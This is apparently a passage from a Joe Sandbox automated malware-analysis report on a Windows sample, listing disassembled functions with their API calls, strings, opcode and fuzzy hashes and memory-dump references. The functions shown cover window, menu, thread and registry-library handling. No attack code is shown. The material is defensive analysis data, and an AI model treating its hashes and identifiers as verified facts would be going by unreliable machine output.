                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$CountItemStringWindow_wcslen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1823500076-0
                                                                                                                            • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                            • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                                                                            • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                            • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                                                                            Function 00448877 Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                            • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                            • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 896007046-0
                                                                                                                            • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                            • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                                                                            • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                            • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                                                                            Function 004413F0 Relevance: 10.6, APIs: 7, Instructions: 114windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                            • SendMessageW.USER32(02ED1BC0,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                            • SendMessageW.USER32(02ED1BC0,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 312131281-0
                                                                                                                            • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                            • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                                                                            • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                            • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                                                                            Function 0044849C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004484C4
                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                                                                            • IsMenu.USER32(?), ref: 0044857B
                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                                                                            • DrawMenuBar.USER32 ref: 004485E4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 3866635326-4108050209
                                                                                                                            • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                            • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                                                                            • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                            • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                                                                            Function 0047244D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                                                                            • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                            • String ID: 0vH
                                                                                                                            • API String ID: 327565842-3662162768
                                                                                                                            • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                            • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                                                                            • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                            • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                                                                            Function 00448AFF Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                                                                            • GetFocus.USER32 ref: 00448B1C
                                                                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                            • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                            • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3429747543-0
                                                                                                                            • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                            • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                                                                            • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                            • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                                                                            Function 0045D321 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                                                                            • __swprintf.LIBCMT ref: 0045D3CC
                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                            • String ID: %lu$HH
                                                                                                                            • API String ID: 3164766367-3924996404
                                                                                                                            • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                            • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                                                                            • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                            • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                                                                            Function 00450DB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                                                                            • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID: Msctls_Progress32
                                                                                                                            • API String ID: 3850602802-3636473452
                                                                                                                            • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                                            • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                                                                            • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                                            • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                                                                            Function 00455449 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00455451
                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0045545F
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3985565216-0
                                                                                                                            • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                                                                            • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                                                                                                                            • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                                                                            • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                                                                                                                            Function 00415702 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                                                                            • __calloc_crt.LIBCMT ref: 00415743
                                                                                                                            • __getptd.LIBCMT ref: 00415750
                                                                                                                            • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                                                                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                                                                            • __dosmaperr.LIBCMT ref: 004157A9
                                                                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1269668773-0
                                                                                                                            • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                                            • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                                                                            • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                                            • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                                                                            Function 00439102 Relevance: 10.5, APIs: 7, Instructions: 46threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                                                              • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1957940570-0
                                                                                                                            • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                            • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                                                                            • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                            • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                                                                            Function 0041568B Relevance: 10.5, APIs: 7, Instructions: 37threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                            • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                            • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4166825349-0
                                                                                                                            • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                                            • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                                                                            • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                                                            • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                                                                            Function 00434124 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 15libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                                                                            • API String ID: 2574300362-3261711971
                                                                                                                            • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                            • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                                                                            • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                                                            • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                                                                            Function 0047B1D0 Relevance: 9.5, APIs: 6, Instructions: 489COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
